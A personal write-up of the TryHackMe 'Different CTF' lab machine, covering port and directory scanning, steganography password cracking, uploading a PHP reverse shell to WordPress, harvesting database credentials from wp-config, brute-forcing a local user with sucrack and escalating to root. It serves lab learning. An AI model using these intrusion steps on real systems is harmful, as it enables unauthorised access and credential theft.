Hello everyone.Today i will explain how you can hack the “Different CTF” machine.Let’s start hack this machine.
nmap -sN -sV <ip>
With Nmap you can enumerate open ports.I tried login FTP as anonymous but it is not allow.Let’s check website.
This site is uses wordpress.Wordpress is need a domain for show the website more straight.I will add this ip address to /etc/hosts file.In this way i can enter site with this domain.If you look page source you can see domain.
Now look better.I want to scan hidden directories with gobuster.
gobuster dir -u http://ip/ -w <wordlist-path>
Let’s check <hidden> directory.
I downloaded this files with wget command.
wget http://ip/<hidden>/wordlist.txt
wget http://ip/<hidden>/austrailian-bulldog-ant.jpg
I think a hidden message inside the image.I tried open message with steghide but i need a password.I will try crack password with wordlist.txt.You can crack password with “Stegcracker”.
Stegcracker usage.
stegcracker <file> <wordlist>
I cracked password.I extracted file with steghide and i found base64 hash.
steghide — extract -sf austrailian-bulldog-ant.jpg
I found FTP username and password.
I can see web files.I think i can put a reverse shell and i can execute it from website.
You can download php reverse shell from Pentestmonkey’s Github page
I edit reverse shell file permissions with chmod(chmod 777=All users can execute,write and read).
Let’s execute shell from website.
Oh we got a problem.I think this website has got a subdomain and we put reverse shell inside subdomain.I want to check web files in FTP
I can see wp-config file.This file is database file and i want to read this file.
I found username and password.I can login phpMyAdmin panel with this username and password.
I want to check phpmyadmin1’s files
I found this under the “wp-options” header.Lets add subdomain to /etc/hosts file.
Let’s try again execute reverse shell from website.
I need more powerful shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
ctrl^z
stty raw -echo && fg
<enter>
stty <your rows and columns value>
Let’s find web flag.
Good Job!Now i must login hakanbey user for user flag.
I will use sucrack tool for crack hakanbey’s password(you can download here.).I think we should add 123*** to all lines of the wordlist file.Because FTP service password and İmage password contain 123***.
I created a Python file.When i execute this file it is add 123*** to all lines.
python <file-name>
I downloaded sucrack to my own machine and i created web server with python from my own machine.
python -m SimpleHTTPServer
I downloaded sucrack file to shell(download to /tmp folder because you dont need download as hakanbey user or root).
wget http://<ip>/<file-name>
Let’s install sucrack tool.
dpkg -x <filename> <foldername>
cd <foldername>/usr/bin
./sucrack -u hakanbey <wordlist>
(You can see help menu with “./sucrack -h”)
Now i can login hakanbey user.
I want to look suid bit
find / -perm -u=s -type f 2>/dev/null
I can see “/usr/bin/binary” this is strange.I will execute binary file with ltrace so file is running in ltrace .
When i execute this file in system and i enter true answer it will give me hint.txt and root.jpg.
It is telling “open image with hexeditor and look 00000020” and i can see “CyberChef” so i should decode hash.Again i created a web server with python and i downloaded root.jpg my own machine.
I looked hint inside Try Hack Me and i should decode From HEX,To Base85.
I found root password this is so good.
Interesting room, you can shoot the sun.
Thanks for read my writeup.
-YAnil Sec